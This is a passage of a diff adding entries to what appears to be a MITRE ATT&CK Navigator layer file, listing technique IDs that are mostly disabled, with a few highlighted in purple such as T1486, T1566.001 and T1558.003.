+        {
+            "enabled": false,
+            "techniqueID": "T1114.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1115"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1116"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1117"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1118"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1119"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1120"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1121"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1122"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1123"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1124"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1125"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1126"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1128"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1129"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1130"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1131"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1133"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1135"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1138"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1139"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1140"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1141"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1142"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1143"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1144"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1145"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1146"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1147"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1148"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1149"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1150"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1151"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1152"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1153"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1154"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1155"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1156"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1157"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1158"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1159"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1160"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1161"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1162"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1163"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1164"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1165"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1166"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1167"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1168"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1169"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1170"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1171"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1172"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1173"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1174"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1175"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1176"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1177"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1178"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1179"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1180"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1181"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1182"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1183"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1184"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1185"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1186"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1187"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1188"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1189"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1190"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1191"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1192"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1193"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1194"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1196"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1197"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1198"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1199"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1200"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1201"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1202"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1203"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1206"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1207"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1208"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1209"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1210"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1211"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1212"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1214"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1215"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1217"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1218"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.010"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1218.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.014"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1219"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1220"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1221"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1223"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1482"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1483"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1485"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1486"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1487"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1488"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1489"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1490"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1490"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1492"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1493"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1494"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1495"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1496"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1500"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1501"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1502"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1503"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1504"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1506"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1514"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1519"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1522"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1525"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1526"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1527"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1528"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1529"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1530"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1531"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1534"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1535"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1536"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1537"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1538"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1539"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.005"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1543"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1543.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.016"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1548"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1548.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1554"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1555"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1555.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1558"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1558.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1562"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1562.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.004"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1567"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1567.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1570"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1571"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1572"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1574"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1574.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1580"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.002"
+        },
+        {
